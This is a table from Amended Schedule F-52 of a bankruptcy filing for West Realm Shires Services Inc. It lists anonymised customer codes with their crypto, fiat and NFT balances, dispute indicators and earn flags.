| 07411556 | | DOGE[.512], ETH[0], ETHW[0], LTC[.0048], SOL[79.51480000], SUSHI[1020.6582], TRX[0.73324822], USD[9.31], USDT[0] | | |
| 07411557 | | BRZ[4], CUSDT[27], DOGE[200.10171235], SHIB[312521.57168502], TRX[3], USD[16.21] | Yes | |
| 07411560 | | SOL[102.15570597], USD[0.00] | | |
| 07411566 | | BTC[.00439582], ETH[.1478594], ETHW[.1478594], NFT (514091141296040726/Fancy Frenchies #3437)[1], USD[3.83] | | |
| 07411568 | | CUSDT[7], DOGE[1373.39288019], TRX[886.17034119], USD[0.00] | | |
| 07411574 | | USD[80.00] | | |
| 07411575 | | BAT[1], SHIB[2], SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07411580 | | USD[177.95] | Yes | |
| 07411581 | | TRX[0], USD[7.19] | | |
| 07411583 | | BRZ[1], CUSDT[8], TRX[3], USD[0.11], USDT[1] | | |
| 07411584 | | BTC[0], ETH[0], USD[1301.94] | | |
| 07411586 | | BAT[1], BRZ[2], CUSDT[3], DOGE[755.8002568], ETH[.02440921], ETHW[.02440921], TRX[2.05772245], USD[0.01] | | |
| 07411599 | | DOGE[.3844], SOL[.00291], USD[0.11] | | |
| 07411601 | | USD[0.01] | | |
| 07411602 | | AUD[0.83], BTC[0.00000257], ETH[.00070038], ETHW[.00070038], EUR[0.80], USD[2.78], USDT[.00786479] | | |
| 07411606 | | BTC[0], ETH[0] | | |
| 07411609 | | BTC[.0010682], CUSDT[1], USD[0.00] | | |
| 07411611 | | DOGE[.856], SOL[.02], SUSHI[.362], USD[2093.15] | | |
| 07411612 | | BTC[.02148371], TRX[1], USD[0.00] | | |
| 07411614 | | SOL[68.2664301], USD[1000.00] | | |
| 07411618 | | BTC[0.00002216], LTC[.00532], SOL[.366], USDT[.9927018] | | |
| 07411624 | | BTC[.02151359], TRX[1], USD[0.00] | | |
| 07411632 | | CUSDT[3], DOGE[31351.87710170], ETH[.31840585], ETHW[.31823125], SOL[0.00009652], TRX[6900.5129057], USD[0.00] | Yes | |
| 07411642 | | BTC[.00016142], SUSHI[0] | | |
| 07411648 | | NFT (504398920350964595/Scene #0276 | Timeline #3)[1], NFT (521937174384184128/Nois3)[1], SOL[0], USD[0.00] | | |
| 07411650 | | BTC[.0000029] | | |
| 07411657 | | USDT[0.00000021] | | |
| 07411658 | | USD[0.00] | | |
| 07411659 | | SOL[5.81695295], USDT[0.00000088] | | |
| 07411660 | | USD[1.15] | | |
| 07411664 | | CUSDT[1], GRT[1], USD[2342.28] | | |
| 07411666 | | CUSDT[2], DOGE[1370.69944709], ETH[.03372601], ETHW[.03372601], USD[650.00] | | |
| 07411669 | | BRZ[2], CUSDT[3], DOGE[1], SOL[0], USD[0.00] | Yes | |
| 07411674 | | ETH[.00685858], ETHW[.00685858], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07411675 | | CUSDT[7], TRX[1], USD[0.00] | | |
| 07411676 | | SOL[.0108635], USDT[17.760676] | | |
| 07411677 | | CUSDT[1], DOGE[0], ETH[0], LTC[.02462259], USD[0.00] | | |
| 07411679 | | USD[0.00], USDT[0] | | |
| 07411681 | | BAT[0], BTC[0], CUSDT[1], DOGE[1], LTC[0], SOL[0], TRX[2], USD[0.65] | | |
| 07411683 | | BTC[0], DOGE[0.82720000], LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07411694 | | BTC[.02176263], DOGE[8977.44031602], ETH[.3434622], ETHW[.3434622], SHIB[24628712.05089808], SOL[1.23527942], USD[0.00] | | |
| 07411697 | | LINK[58.4], MATIC[.122], SUSHI[142.3815], UNI[52.68946], USD[0.00], USDT[242.16] | | |
| 07411699 | | CUSDT[4], DOGE[.00468918], SHIB[22.69956619], USD[13.28] | Yes | |
| 07411700 | | SOL[68.52658231], USD[0.00] | | |
| 07411703 | | USDT[.252] | | |
| 07411706 | | USD[3.82] | | |
| 07411707 | | USD[0.00] | | |
| 07411709 | Contingent, Disputed | USD[0.00] | | |
| 07411711 | | CUSDT[3], GRT[1], TRX[1], USD[0.04] | | |
| 07411713 | | BTC[.000024], USD[0.90] | | |
| 07411717 | | BAT[1.01655549], USD[0.01], USDT[1.08383092] | Yes | |
| 07411721 | Contingent, Disputed | DAI[0], USD[0.00], USDT[0] | | |
| 07411727 | | BTC[0.00003939], DOGE[1.996], SOL[.0068], USD[0.03] | Yes | |
| 07411737 | | BTC[0.03065457], ETH[0.31080104], ETHW[0.31080104], USD[3.29], USDT[0] | | |
| 07411749 | | CUSDT[13.95878509], DOGE[0], USD[0.00] | | |
| 07411754 | | BAT[1], BTC[.00824289], GRT[1], USD[0.00] | | |
| 07411755 | | DOGE[.471], USD[-198.32], USDT[497.57172] | | |
| 07411756 | | NEAR[.04540328], USD[0.00] | Yes | |
| 07411761 | | DOGE[10.71938291], USD[15.67] | | |
| 07411766 | | ETH[.00000001], SOL[0], USD[0.00] | | |
| 07411768 | | BRZ[1], BTC[0.00006185], CUSDT[9], DOGE[1], SHIB[1], SUSHI[0], TRX[9], USD[0.06] | | |
| 07411769 | | LTC[.001], USD[0.03] | | |
| 07411772 | | ETH[.12827871], ETHW[.12718224], KSHIB[3312.82809808], SHIB[2763601.04470830], TRX[4232.12631386], USD[0.01], USDT[0] | Yes | |
| 07411774 | | BRZ[1], CUSDT[3], DOGE[1], TRX[2], USD[0.01], USDT[1] | | |
| 07411779 | | BTC[0], DOGE[1.9333976], MATIC[0], SHIB[0], USD[0.00] | Yes | |
| 07411780 | | DOGE[110] | | |
| 07411781 | | CUSDT[4], ETH[.00788717], ETHW[.00788717], USD[32.17] | | |
| 07411782 | | CUSDT[1], USD[0.00] | | |
| 07411785 | | USD[0.01], USDT[0] | | |
| 07411789 | | BTC[0], SOL[0], USD[0.11], USDT[0] | | |
| 07411798 | | BRZ[2], CUSDT[5], TRX[162.12947197], USD[0.00] | Yes | |
| 07411808 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07411811 | | CUSDT[1], USD[0.26] | | |
| 07411812 | | BAT[.0024253], BRZ[15.70500341], CUSDT[58.64024733], DOGE[19109.4136656], GRT[202.81208026], KSHIB[.00000628], LINK[.19355659], MATIC[543.04307458], NEAR[69.00162518], SHIB[45319388.72661483], SOL[23.11837655], TRX[5.26963844], USD[0.57], USDT[2.10266241] | Yes | |
| 07411814 | | ETHW[1.4266753], NFT [383342860513930415/Birthday Cake #1281][1], NFT [433715485220056948/The 2974 Collection #1281][1], NFT [496538394447362091/Mister Ughbear][1], NFT [565573126419177794/Merry Christmas][1], USD[9.03] | | |
| 07411817 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LTC[0], UNI[0], USD[0.00], USDT[0] | | |
| 07411820 | | USD[10.00] | | |
| 07411830 | | TRX[.445682] | | |
| 07411833 | | USD[0.00] | | |
| 07411834 | | CUSDT[1], DOGE[156.91063008], TRX[102.01347338], USD[0.00] | | |
| 07411835 | | BTC[.00664935], DOGE[7], SHIB[15], SOL[6.16760975], TRX[3], USD[0.21], USDT[0] | Yes | |
| 07411845 | | CUSDT[806.09769613], DOGE[716.43253311], TRX[524.45936222], USD[0.01], USDT[0] | | |
| 07411850 | | USD[0.01] | | |
| 07411853 | | BRZ[1], CUSDT[1], DOGE[1], USD[0.01] | Yes | |
| 07411857 | | ETHW[1.239], NFT [575634486286889702/Aerial Phenomena][1], USD[0.00] | | |
| 07411862 | | USD[0.22] | | |
| 07411868 | | USD[0.00] | | |
| 07411875 | | ETH[.00000001], ETHW[0], USD[0.00] | | |
| 07411880 | | BTC[0.00004580], LTC[0], USD[0.00], USDT[0] | | |
| 07411882 | | USD[0.00], USDT[0.00000001] | | |
| 07411887 | | CUSDT[1], DOGE[1], SHIB[1], TRX[49.04726462], USD[0.01] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07411888 | | ETH[.066732], ETHW[.066732], NFT (304455234435384176/Wassie 9388)[1], NFT (437792362615562653/#201)[1], NFT (486274203142574525/Borne #45)[1], NFT (523462753877566695/Coachella x FTX Weekend 1 #22836)[1], USD[0.00], USDT[.766158] | | |
| 07411893 | | BTC[0], CUSDT[2], DOGE[3], GRT[0], SOL[0], SUSHI[0], TRX[5], UNI[0], USD[0.00], USDT[1] | | |
| 07411900 | | BTC[.00576427], ETH[2.88514255], ETHW[1.95308537], NFT (535445961197629927/Coachella x FTX Weekend 1 #8800)[1], SHIB[1], SOL[16.25760374], USD[-180.93], USDT[0] | Yes | |
| 07411901 | | BAT[2], BRZ[1], CUSDT[1], DOGE[2], USD[0.01] | | |
| 07411910 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07411916 | | SOL[.09814908], USD[0.53] | | |
| 07411921 | | BCH[.00028535], ETH[.00002016], ETHW[.00002016], SOL[0], USD[0.00] | | |
| 07411924 | | BTC[0], USD[1.34] | | |
| 07411927 | | BTC[.0003914] | | |
| 07411934 | | BRZ[1], CUSDT[11], DOGE[1], LINK[0], TRX[0], USD[2.74], USDT[0] | | |
| 07411936 | | USD[10.13] | Yes | |
| 07411937 | | BRZ[2], BTC[.00918372], DOGE[5], ETH[.10903238], ETHW[0.00000110], LINK[30.67865747], LTC[2.54647324], MATIC[60.37079244], SHIB[1073275.69322874], TRX[2], USD[0.00], USDT[0.00018312] | Yes | |
| 07411941 | | BTC[0], CUSDT[1], DOGE[4], SUSHI[0], TRX[1], UNI[0], USD[0.00] | | |
| 07411943 | | BRZ[4], CUSDT[6], DOGE[2], SHIB[4], TRX[3], USD[163.15], USDT[4.92395676] | Yes | |
| 07411945 | | CUSDT[1], DOGE[2], GRT[1.00498957], USD[0.00] | Yes | |
| 07411950 | | USD[0.25], USDT[0] | Yes | |
| 07411958 | | BAT[.66], SOL[.972], TRX[.527], USD[1.44], USDT[5.56076025] | | |
| 07411959 | | BTC[.0042016], CUSDT[4], DOGE[316.08774677], USD[0.00] | | |
| 07411971 | | BRZ[1], CUSDT[3], DOGE[2], ETH[.00000002], ETHW[0.49870394], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07411976 | | ETH[.00000001], ETHW[0], MATIC[.00000001], USD[2.47], USDT[0.00000001] | Yes | |
| 07411980 | | DOGE[2], ETH[.37204561], ETHW[.37204561], USD[0.00] | | |
| 07411991 | | USD[0.00] | | |
| 07411992 | | USD[0.71], USDT[0] | | |
| 07412007 | | DOGE[1], USD[8.00] | | |
| 07412008 | | BTC[.00100265], DOGE[0], ETH[0.00003341], ETHW[0], LTC[0], SOL[0], TRX[.000003], USD[0.00], USDT[5.34290648] | | |
| 07412023 | | ETH[.11081645], ETHW[.10971584] | Yes | |
| 07412031 | Contingent, Disputed | USD[0.04] | | |
| 07412034 | | DOGE[0], USD[1.19] | | |
| 07412036 | | CUSDT[1], USD[0.19] | | |
| 07412037 | | BTC[.00026842], DOGE[2], LTC[.07227482], USD[0.00] | | |
| 07412044 | | BRZ[2], BTC[.01183727], CUSDT[4], DOGE[4.00482480], ETH[0.16243653], ETHW[0.16197329], GRT[1.00119703], SHIB[15145341.46673408], SOL[0], TRX[2957.51175181], USD[194.92], USDT[1.08411422] | Yes | |
| 07412049 | | CUSDT[2], ETH[.02940502], ETHW[.02903539], SHIB[750571.12113493], USD[41.04] | Yes | |
| 07412052 | | BTC[0], CUSDT[4], DOGE[1.00000514], TRX[1], USD[0.00] | | |
| 07412057 | | BCH[0], BTC[0.00002341], ETH[0.00001000], ETHW[.00001], GRT[.5803], LINK[.01238612], SOL[.0015517], SUSHI[.253225], TRX[.000001], USD[0.39], USDT[0], YFI[0.00080299] | | |
| 07412062 | | DOGE[56.47600000], ETH[0.01131586], ETHW[0.01131586], GRT[100.83], MATIC[189.61], SHIB[1498500], SOL[.4995], USD[13.83], USDT[0] | | |
| 07412073 | | DOGE[1], ETH[.01722409], ETHW[.01722409], USD[10.00] | | |
| 07412079 | | BRZ[1], CUSDT[8], DOGE[1246.61708433], TRX[1], USD[58.33] | Yes | |
| 07412088 | | CUSDT[1], DOGE[1], USD[0.00], USDT[1.09936218] | Yes | |
| 07412094 | | SOL[174.81], USD[4500.24], USDT[0] | | |
| 07412100 | | CUSDT[8], DOGE[3], LTC[0], SHIB[13751.03051795], SOL[0.38265129], TRX[3], USD[0.00] | Yes | |
| 07412101 | | CUSDT[8], DOGE[1], LTC[.77430547], TRX[2], USD[0.46] | Yes | |
| 07412102 | | BRZ[1], CUSDT[4], DOGE[1], TRX[2], USD[3.73], USDT[0] | Yes | |
| 07412108 | | USD[0.00], USDT[0.00000028] | | |
| 07412112 | | USD[0.00] | | |
| 07412113 | | BTC[.00005], ETH[.080022], ETHW[2.0769], SOL[0.00057168] | | |
| 07412114 | | ETH[.00000001], SOL[0] | | |
| 07412123 | | SUSHI[1.09178649], USD[0.00], USDT[0.00000002] | | |
| 07412124 | | DOGE[0], ETH[0], TRX[0], YFI[0] | | |
| 07412125 | | BTC[0.01039542], CUSDT[1], USD[0.00] | Yes | |
| 07412130 | | ETH[.00000002], USD[0.00], USDT[0.00000001] | Yes | |
| 07412137 | | USD[0.00] | | |
| 07412144 | | BTC[0.00587079], NFT (504627866296644421/Reflection '14 #58 (Redeemed))[1], NFT (504795489098663226/SBF Hair & Signature #7 #27)[1], NFT (555224617513101606/Imola Ticket Stub #1466)[1], SOL[0], SUSHI[.46566606], USD[100.25], USDT[.8152021] | | |
| 07412149 | | USD[2.57] | | |
| 07412152 | | DOGE[10633.852], SOL[20.966], USD[2179.83] | | |
| 07412158 | | USD[0.00] | | |
| 07412161 | | DOGE[3405.88074394], ETH[0], TRX[0], USD[0.00] | Yes | |
| 07412167 | | SOL[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07412168 | | BTC[0], SOL[189.68289311], USD[47.66] | | |
| 07412169 | | BRZ[1], CUSDT[4], DOGE[.00088851], TRX[3], USD[0.01] | | |
| 07412173 | | USD[0.00] | | |
| 07412178 | | BTC[.0073025], DOGE[0], SOL[14.07669600] | | |
| 07412181 | | BAT[2.09822583], BRZ[1], CUSDT[1], DOGE[1], GRT[1.00367791], SHIB[1], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07412183 | | DOGE[.1305], SOL[.02794], TRX[.271], USD[0.16] | | |
| 07412185 | Contingent, Disputed | USD[0.00] | | |
| 07412186 | | ETH[.00052823], ETHW[.00052823], USD[0.01], USDT[1.98661242] | | |
| 07412189 | | AUD[0.00], BTC[0], CAD[0.00], EUR[0.00], GBP[0.00], PAXG[0], USD[0.01], USDT[0.00128176] | | |
| 07412192 | | BAT[1.0165555], CUSDT[1], DOGE[1], TRX[2], USD[0.00] | Yes | |
| 07412199 | | BTC[0], DOGE[0], MATIC[0], SOL[0.00303968], USD[0.00] | | |
| 07412204 | | BCH[.000152], BF_POINT[500], BTC[0.00003751], LTC[.3010556], USD[5.66] | | |
| 07412207 | | GRT[3.2757714], USD[0.00] | | |
| 07412209 | | BTC[0], USD[0.00] | | |
| 07412217 | | USD[0.52] | | |
| 07412227 | | BRZ[2], CUSDT[10], DOGE[2], GRT[0], SOL[0], UNI[0], USD[0.00] | Yes | |
| 07412230 | | SOL[.17509], USD[0.24] | | |
| 07412237 | | USDT[.112851] | | |
| 07412239 | | BTC[.0014274], ETH[.0981553], ETHW[0.09815529], SOL[0], USD[1.90] | | |
| 07412245 | | NFT (496963522427467503/Romeo #683)[1] | | |
| 07412250 | | BTC[0.00002824], ETH[.00095785], ETHW[.00095785], SOL[0], USD[246.29], USDT[0] | | |
| 07412251 | | CUSDT[2], USD[0.00] | | |
| 07412252 | | BTC[0], DOGE[0], ETH[0], GRT[.00000597], USD[0.00] | | |
| 07412253 | | BAT[3.17863837], BRZ[3], CUSDT[1], DOGE[9.04591182], ETHW[5.38430351], SHIB[1], SOL[.00000001], TRX[6], UNI[1.06188558], USD[0.00], USDT[1.06188558] | Yes | |
| 07412256 | | BTC[.00000002], ETHW[.05552933], SOL[.00035548], USD[0.00] | Yes | |
| 07412272 | | USD[3.00] | | |
| 07412273 | | BTC[0], CUSDT[8], DOGE[1], LTC[0], SOL[0.00000457], TRX[1], USD[142.33] | Yes | |
| 07412277 | | DOGE[2], SOL[127.29426001], TRX[1], USD[0.00] | Yes | |
| 07412278 | | BTC[.0006706], LINK[.04262], USD[0.37] | | |
| 07412279 | | USD[0.00] | | |
| 07412283 | | USD[9.80], USDT[0] | | |
| 07412285 | | SOL[0], USD[7.50] | | |
| 07412286 | | BRZ[1], CUSDT[3], DOGE[1], TRX[900.14419318], USD[0.00] | Yes | |
| 07412310 | | BAT[1.01533085], CUSDT[1], DOGE[6.08186807], GRT[1.00152623], SHIB[1], USD[0.01] | | |
| 07412312 | | USD[0.00] | | |
| 07412315 | | CUSDT[1], DOGE[3], SOL[90.37000103], TRX[2], USD[0.00], USDT[1.06682163] | Yes | |
| 07412318 | | USD[11.31] | | |
| 07412322 | | BTC[0], CUSDT[2], USDT[0.00016321] | | |
| 07412327 | | SOL[.02041324], USD[3.20], USDT[0] | Yes | |
| 07412328 | | BAT[46.062596], BRZ[1], DOGE[822.93432191], TRX[1], USD[0.01] | | |
| 07412334 | | BAT[0], CUSDT[5], DOGE[1], GRT[0], LINK[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07412335 | Contingent, Disputed | CUSDT[1], DOGE[1], USD[0.39] | | |
| 07412340 | | USD[0.00] | | |
| 07412345 | | BTC[0], DOGE[3], MATIC[80.0641658], NFT (302159911014374181/Founding Frens Investor #697)[1], NFT (383471551861193324/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #45)[1], NFT (405533430933687919/Violet)[1], NFT (554098116315970537/GalaxyKoalas # 635)[1], SHIB[11580751.48661723], SOL[26.59384326], TRX[3199.69345915], USD[6.48], USDT[0] | Yes | |
| 07412346 | | BTC[.00002208], ETH[0], USD[0.03] | | |
| 07412347 | | CUSDT[7], USD[0.01] | | |
| 07412348 | | BTC[.0352408], LINK[.0657], SOL[.0312], USD[0.78] | | |
| 07412351 | | BRZ[1], BTC[.00879865], CUSDT[2], DOGE[603.8930934], ETH[.12248916], ETHW[.12248916], TRX[1], USD[0.00] | | |
| 07412352 | | BRZ[1], BTC[.0040466], CUSDT[3], DOGE[942.52832685], USD[10.00] | | |
| 07412353 | | BTC[0], DOGE[19852.69690970], LINK[1556.49485809], SOL[0], USD[0.00] | | |
| 07412355 | | CUSDT[1], DOGE[3667.1360014], USD[0.00] | | |
| 07412357 | Contingent, Disputed | DOGE[0], SOL[0], USD[0.00] | | |
| 07412362 | | ETH[.0837], ETHW[.0837] | | |
| 07412369 | | ETH[.00000037], ETHW[.00000037], MATIC[.00109119], SOL[.00002883], USD[0.00] | Yes | |
| 07412371 | | BAT[.00257219], BRZ[59.28741784], CUSDT[2373.7697718], DOGE[1.00009096], ETH[.00006307], ETHW[.00006307], LINK[.00002788], LTC[.00000124], SUSHI[4.43583754], TRX[1.00326368], USD[0.02] | | |
| 07412372 | | USD[0.00] | | |
| 07412373 | | ETH[.00000001], NFT (423808870855675933/Night Light #36)[1], TRX[0], USD[0.88], USDT[0.00951800] | | |

West Realm Shires Services Inc.

Amended Schedule F-52: Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07412390 | | BRZ[1], USD[0.00] | | |
| 07412391 | | USD[25.00] | | |
| 07412398 | | ETH[.00110707], ETHW[.00110707], USD[0.00] | | |
| 07412401 | | SOL[0] | | |
| 07412403 | | BTC[0], ETH[.00000001], ETHW[0], SOL[7.73863571], USD[50.54], USDT[0.00000471] | | |
| 07412404 | | BTC[.0000888], DOGE[.171], USD[160.11] | | |
| 07412411 | | USD[5.00] | | |
| 07412413 | | BAT[1.01126583], BRZ[3], BTC[0], CUSDT[8], LINK[0], SHIB[3], TRX[9], USD[0.00], USDT[1.00063755] | Yes | |
| 07412418 | Contingent, Disputed | BAT[119.93345547], CUSDT[1], DOGE[2], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07412420 | | ETH[0], USDT[1.31301974] | | |
| 07412424 | | BRZ[1], CUSDT[3], USD[0.00] | | |
| 07412434 | | USD[0.09] | | |
| 07412435 | | USD[0.04], USDT[497.76096] | | |
| 07412437 | | USD[0.15] | | |
| 07412440 | | BRZ[1], CUSDT[6], DOGE[0], TRX[100.66855517], USD[0.00] | | |
| 07412441 | Contingent, Disputed | BTC[.0023799], DOGE[1], TRX[1], USD[0.42] | | |
| 07412449 | | BTC[.00301188] | | |
| 07412450 | | ETH[0.00000014], ETHW[1.88557814], SOL[0], USDT[0.05290755] | | |
| 07412453 | | BTC[.02140349] | | |
| 07412456 | | BTC[.00009924], USD[4.97] | | |
| 07412457 | | GRT[.767], SUSHI[.098] | | |
| 07412459 | | ETHW[1.4679126], USD[12.62] | | |
| 07412465 | | BRZ[0.00000041], DAI[0], DOGE[1], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], USD[0.00], USDT[0.00000012] | Yes | |
| 07412467 | Contingent, Disputed | TRX[1], USD[0.82], USDT[1] | | |
| 07412470 | Contingent, Disputed | BTC[.02862461], TRX[1], USD[-242.46] | | |
| 07412471 | | BAT[35.83011689], BCH[.02029499], BTC[.0014801], CUSDT[4], DOGE[4.05209868], ETH[.10469934], ETHW[.10363117], GRT[6.46913687], LTC[.11488482], MATIC[42.02929208], SUSHI[.91931761], TRX[1476.72487826], USD[0.00] | Yes | |
| 07412475 | | BAT[.18207105], DOGE[.95902121], GRT[.27744549], SHIB[138429.48775885], SOL[.00385223], TRX[1.07337736], USD[-0.10] | Yes | |
| 07412478 | | AUD[0.00], BAT[1.60012614], BCH[.00142438], BRZ[16.51595072], BTC[0.00000001], CUSDT[135.84715911], DAI[3.9744517], DOGE[.43108077], ETH[.00000007], ETHW[0.00000006], EUR[0.01], GRT[.04970707], LINK[.00974857], LTC[.00022739], PAXG[.00000603], SGD[0.01], SOL[.00002415], SUSHI[.04636277], TRX[2.90421688], UNI[.01056431], USD[0.26] | | |
| 07412480 | | DOGE[1], USD[0.00] | | |
| 07412481 | | BTC[.00010762] | | |
| 07412485 | | BAT[3.17731557], BRZ[3], CUSDT[3], DOGE[5.04917976], ETHW[.36700442], GRT[2.03561465], NFT [34154034958025496 2/Bold Badger #5433][1], TRX[6], USD[0.00] | Yes | |
| 07412489 | | BAT[1], BCH[.30905678], BRZ[1], BTC[.1632109], CUSDT[1], DOGE[1929.2748873], ETH[1.07997887], ETHW[.66452247], GRT[1], LINK[44.79414102], SHIB[12], SOL[7.96613737], TRX[2652.46421389], USD[0.00], USDT[0.00002655] | Yes | |
| 07412490 | | BRZ[2], DOGE[135.53913655], ETH[.00000135], LINK[1.24072356], MATIC[10.66877871], SHIB[5], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07412499 | | ETH[0], SOL[0] | | |
| 07412502 | | DOGE[1284.84], LTC[1.00164], TRX[1250.936], USD[0.25] | | |
| 07412504 | | CUSDT[3], TRX[981.14129466], USD[0.01] | Yes | |
| 07412505 | | BTC[.0005723] | | |
| 07412506 | | USD[0.00] | | |
| 07412509 | | CUSDT[1], DOGE[4483.90858193], USD[0.00] | | |
| 07412511 | | BAT[1], SHIB[74618000], TRX[5.5], USD[0.35], USDT[11.08300000] | | |
| 07412512 | | BRZ[1], BTC[.0008941], CUSDT[1], DOGE[257.60296601], TRX[385.23385836] | | |
| 07412517 | | ETH[.00000001], ETHW[0], USD[2.03] | | |
| 07412523 | | CUSDT[1], SOL[26.20362945], USD[0.00] | | |
| 07412524 | | ETH[0], USD[0], USDT[0] | | |
| 07412525 | | USD[0.00], WBTC[.00008978] | | |
| 07412530 | | BTC[0.10346690], TRX[.000001] | | |
| 07412535 | | CUSDT[2], DOGE[55.53435685], LTC[.06256482], USD[10.00] | | |
| 07412538 | | BTC[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], UNI[0], USD[0.00] | | |
| 07412539 | | BRZ[1242.49274776], CHF[0.11], NFT [519120297280138850/All stars on Boardwalk ][1], TRX[1], USD[103.81] | Yes | |
| 07412541 | | BTC[.00009211], USD[0.00] | | |
| 07412546 | | GRT[.8], NFT [447153434664573214/FTX Crypto Cup 2022 Key #1372][1], NFT [512685462872165824/Microphone #9094][1], NFT [548492843906437033/Entrance Voucher #29740][1], USD[0.00] | | |
| 07412553 | | DOGE[3], TRX[1], USD[0.77] | | |
| 07412555 | Contingent, Disputed | BAT[1], BTC[.01162066], ETH[0], EUR[0.00], GBP[0.00], LINK[1], TRX[2], UNI[1], USD[355.19] | | |
| 07412556 | | BTC[.0000224], LTC[.00926], SOL[0.13153000], TRX[.000007], USD[0.00], USDT[0] | | |
| 07412558 | | BRZ[6.03969221], DOGE[1784.17351209], ETH[0], MATIC[0], SHIB[26], SOL[0.00003743], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07412569 | | BRZ[5], CUSDT[4], DOGE[14], GRT[0], LINK[0], SOL[0], TRX[1], USD[0.01], USDT[1] | | |
| 07412575 | Contingent, Disputed | BRZ[1], BTC[.01065985], USD[278.15] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07412582 | | BCH[.00063039], BRZ[1], CUSDT[5], DOGE[4], LTC[.00396264], TRX[4], UNI[.01332261], USD[0.00] | | |
| 07412584 | | TRX[1], USD[0.00] | | |
| 07412585 | | BRZ[2], BTC[.00000058], DOGE[1], TRX[2], USD[0.99] | | |
| 07412587 | Contingent, Disputed | BTC[.02211275], DOGE[1], USD[120.46] | | |
| 07412591 | | BTC[0], USD[0.00], USDT[0.00007082] | | |
| 07412592 | | BAT[3.0008494], CUSDT[5], DOGE[11.21065018], GRT[3.00214706], SHIB[2], TRX[9], USD[0.01], USDT[1.06160635] | Yes | |
| 07412593 | | BTC[0], SOL[5.84000001], USD[0.03] | | |
| 07412594 | | USD[10.00] | | |
| 07412600 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07412601 | | SHIB[0], UNI[.093065], USD[0.59] | | |
| 07412602 | | DOGE[0], UNI[0], USD[0.00], USDT[0] | | |
| 07412603 | | BRZ[1], BTC[.00417523], CUSDT[1], DOGE[2116.6363754], USD[0.00] | | |
| 07412604 | | BTC[.00001041], USD[0.00], USDT[0] | | |
| 07412608 | | USD[0.81] | | |
| 07412611 | | CUSDT[1], USD[0.00] | Yes | |
| 07412612 | | CUSDT[1], USD[0.72] | | |
| 07412617 | | BTC[0], NFT (484219570674049317/Entrance Voucher #4730)[1], USD[0.00] | | |
| 07412630 | | CUSDT[10], DOGE[3331.76732833], USD[0.00] | Yes | |
| 07412633 | | USD[0.00] | | |
| 07412636 | | BTC[0.00003282], ETH[.003676], ETHW[.003676], SOL[.0025], USD[2.73], USDT[4.215168] | | |
| 07412637 | | USD[0.00] | | |
| 07412638 | | DAI[99.28385579], DOGE[1], SOL[34.350385] | | |
| 07412642 | | CUSDT[1], DOGE[1], GRT[694.91002847], SUSHI[1], TRX[3], USD[0.00], USDT[1] | | |
| 07412643 | | DOGE[581.664], LINK[4.3824], USD[4.37] | | |
| 07412646 | | BRZ[1], TRX[3], USD[0.00], USDT[1] | | |
| 07412647 | | USD[1.00] | | |
| 07412651 | | MATIC[28.36047612], SHIB[2], USD[0.00] | Yes | |
| 07412659 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07412670 | | BTC[.02081639], CUSDT[1], USD[0.00] | | |
| 07412672 | | CUSDT[1], DOGE[3], MATIC[.00975112], SOL[15.1303827], TRX[4], USD[0.00], USDT[1.07100058] | Yes | |
| 07412673 | | CUSDT[3], DOGE[0], TRX[19.71707199], USD[31.12] | | |
| 07412674 | | TRX[2.27682026], USD[0.01] | | |
| 07412676 | | DOGE[19633.25178322], ETH[3.11037291], ETHW[3.11037291], USD[0.00] | | |
| 07412679 | | BRZ[2], DOGE[4], SHIB[11], TRX[3], USD[0.00] | Yes | |
| 07412681 | | DOGE[0], SOL[0], SUSHI[0], UNI[0] | | |
| 07412684 | | BTC[.00022353], CUSDT[57.42062488], DOGE[263.5935023], SHIB[593763.28405365], TRX[1], USD[0.00] | Yes | |
| 07412687 | | CUSDT[1], LINK[2.24047385], USD[0.00] | Yes | |
| 07412688 | | USD[0.33] | | |
| 07412690 | | USD[0.01] | | |
| 07412691 | | BTC[0], DOGE[0], ETH[0], USD[0.16] | | |
| 07412697 | | GRT[1], USD[0.00] | | |
| 07412703 | Contingent, Disputed | BAT[1], BTC[.00801882], USD[303.31] | | |
| 07412715 | | DOGE[12.04661834], USD[0.01] | | |
| 07412718 | Contingent, Disputed | BTC[.00840081], GRT[1], USD[338.20] | | |
| 07412719 | | BAT[0.00049205], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07412722 | | BF_POINT[400], BTC[0], DOGE[1], ETH[3.45425373], ETHW[3.4528613], SOL[188.47630065] | Yes | |
| 07412728 | | DOGE[1], USD[0.00] | | |
| 07412734 | | SHIB[858], USD[0.00] | Yes | |
